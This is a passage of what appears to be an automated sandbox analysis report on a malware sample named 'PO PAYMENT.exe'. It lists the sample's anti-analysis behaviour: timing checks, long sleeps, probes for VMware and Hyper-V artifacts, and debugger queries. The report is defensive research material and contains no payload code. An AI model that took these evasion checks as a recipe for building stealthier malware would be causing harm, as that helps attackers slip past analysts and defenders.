          Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\PO PAYMENT.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\PO PAYMENT.exe TID: 4792 | Thread sleep time: -41500s >= -30000s
          Source: C:\Users\user\Desktop\PO PAYMENT.exe TID: 4668 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 7080 | Thread sleep count: 36 > 30
          Source: C:\Windows\explorer.exe TID: 7080 | Thread sleep time: -72000s >= -30000s
          Source: C:\Windows\SysWOW64\explorer.exe TID: 5760 | Thread sleep time: -70000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: explorer.exe, 00000002.00000000.365746556.0000000008430000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000002.00000000.365716590.00000000083E9000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000002.00000000.361454889.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.362008137.00000000063F6000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: PO PAYMENT.exe, 00000000.00000002.349094746.0000000002ED7000.00000004.00000001.sdmp | Binary or memory string: vmware
          Source: explorer.exe, 00000002.00000000.365716590.00000000083E9000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000002.00000000.365633163.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: 1efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA+
          Source: PO PAYMENT.exe, 00000000.00000002.349094746.0000000002ED7000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: PO PAYMENT.exe, 00000000.00000002.349094746.0000000002ED7000.00000004.00000001.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: PO PAYMENT.exe, 00000000.00000002.349094746.0000000002ED7000.00000004.00000001.sdmp | Binary or memory string: VMWARE
          Source: explorer.exe, 00000002.00000000.365633163.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: PO PAYMENT.exe, 00000000.00000002.349094746.0000000002ED7000.00000004.00000001.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000002.00000000.361454889.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000000.361454889.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: PO PAYMENT.exe, 00000000.00000002.349094746.0000000002ED7000.00000004.00000001.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: PO PAYMENT.exe, 00000000.00000002.349094746.0000000002ED7000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
          Source: PO PAYMENT.exe, 00000000.00000002.349094746.0000000002ED7000.00000004.00000001.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000002.00000000.365633163.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000002.00000000.365746556.0000000008430000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000002.00000000.352476611.000000000095C000.00000004.00000020.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 00000002.00000000.361454889.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\PO PAYMENT.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\PO PAYMENT.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\explorer.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_0040ACD0 LdrLoadDll
          Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_0156B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_0154B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_0154C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_01549100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_0157513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_01564120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_01564120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_015D41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_0154B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_016049A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_01572990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_01574190 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_0157A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_0156C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_015C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_015699BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_015699BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_015761A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_015C69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_01560050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_01602073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_01611074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_015C7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_0156A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0156A830 mov eax, dword ptr fs:[0000